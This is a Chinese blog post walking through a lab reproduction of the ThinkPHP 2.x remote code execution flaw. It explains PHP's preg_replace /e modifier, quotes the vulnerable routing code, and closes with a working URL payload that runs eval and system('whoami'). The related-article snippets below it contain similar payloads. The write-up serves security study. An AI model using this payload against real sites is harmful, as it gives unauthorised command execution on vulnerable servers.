ThinkPHP2-RCE漏洞复现

最新推荐文章于 2024-06-23 19:07:57 发布
最新推荐文章于 2024-06-23 19:07:57 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 渗透测试实验 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/125179451
版权

ThinkPHP2-RCE漏洞复现

影响版本:PHP 5.2~5.6

/e 修 正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错 误。

在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

例如:

<?php
$a = "abc";
$b = "aaaachummercaaaa";
echo preg_replace("/c(.+?)c/e",$a,$b);
?>;

输出:aaaaabcaaaa;

如果$a可控,如下:

<?php
$a = 'print_r("AAA");';
$b = "aaaac123caaaa";
echo preg_replace("/c(.+?)c/e",$a,$b);
?>;

输出如下:

由此可见,preg_replace()函数在匹配时,会自动执行replacement。

我们在对代码进行修改

<?php
function test($str){
    return "$str";
}
$a = "test('\1');";
$b = "aaaac${@print_r('AAA')}caaaa";
preg_replace("/c(.+?)c/e",$a,$b);
?>;

输出:

通过上图可以看到,如果$b可控,匹配到的字符串传递给了test函数,并将返回值给了$a,从而控制$a。这样就可以通过preg_replace()的/e修饰符执行可控参数了。

然而,/e修饰符在php版本为5.2~5.6时才可使用。

再回来看ThinkPHP2漏洞的出现点:

ThinkPHP/Lib/Think/Util/Dispatcher.class.php:102

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
            $_GET   =  array_merge($var,$_GET);

其中的$var为前面定义的一个数组。

将两个匹配到的字符串分别复制给$var的key和value,/e修饰符使其能够执行。

$paths定义如下:

它的功能是返回URL后面的参数

thinkphp路由的格式是分组/模块/操作名/参数

因此构造payload:

?s=/a/b/c/${@eval($_GET[1])}&1=system(%27whoami%27);

Hummer-200
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1580
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
thinkphp漏洞】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1513
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞(六十四)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 1063
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
漏洞】[ThinkPHP]2-Rce
Mr_atopos的博客
05-22 709
在BUU上 [ThinkPHP]2-Rce
thinkphp-2x-rce 代码执行[VULFOCUS]
m0_37638874的博客
09-08 863
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。s=/模块/控制器/操作/[参数名/参数值…http://serverName/index.php(或者其他应用入口文件)/模块/控制器/操作/[参数名/参数值…在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由。值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将。
thinkphp 2-rce
weixin_51692662的博客
11-01 496
thinkphp 2-rce
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
thinkphp 2 - rce漏洞
2301_76467680的博客
06-28 170
打开页面成功说明存在漏洞。利用eval函数进行绕过。
PHPER应注意的安全漏洞
大春博客
09-02 1020
     WEB应用程序漏洞查找基本上是围绕两个元素展开:变量与函数。也就是说一漏洞的利用必须把你提交的恶意代码通过变量经过n次变量转换传递,最终传递给目标函数执行,还记得MS那句经典的名言吗?“一切输入都是有害的”。这句话只强调了变量输入,很多程序员把“输入”理解为只是gpc[$_GET,$_POST,$_COOKIE],但是变量在传递过程产生了n多的变化。导致很多过滤只是个“纸老虎
ThinkPHP2--RCE漏洞
m0_74402888的博客
05-03 1081
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 462
thinkphp-2x-rce 代码执行
渗透测试之路:ThinkPHP漏洞
m0_68353775的博客
01-10 2316
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
BUUCTF-Real-[ThinkPHP]2-Rce1
分享
02-03 1111
ThinkPHP 2.x 任意代码执行漏洞
【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞
qq_58873970的博客
09-07 385
----------------梦想,想像力和希望实这些梦想的人的勇气充满希望。
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值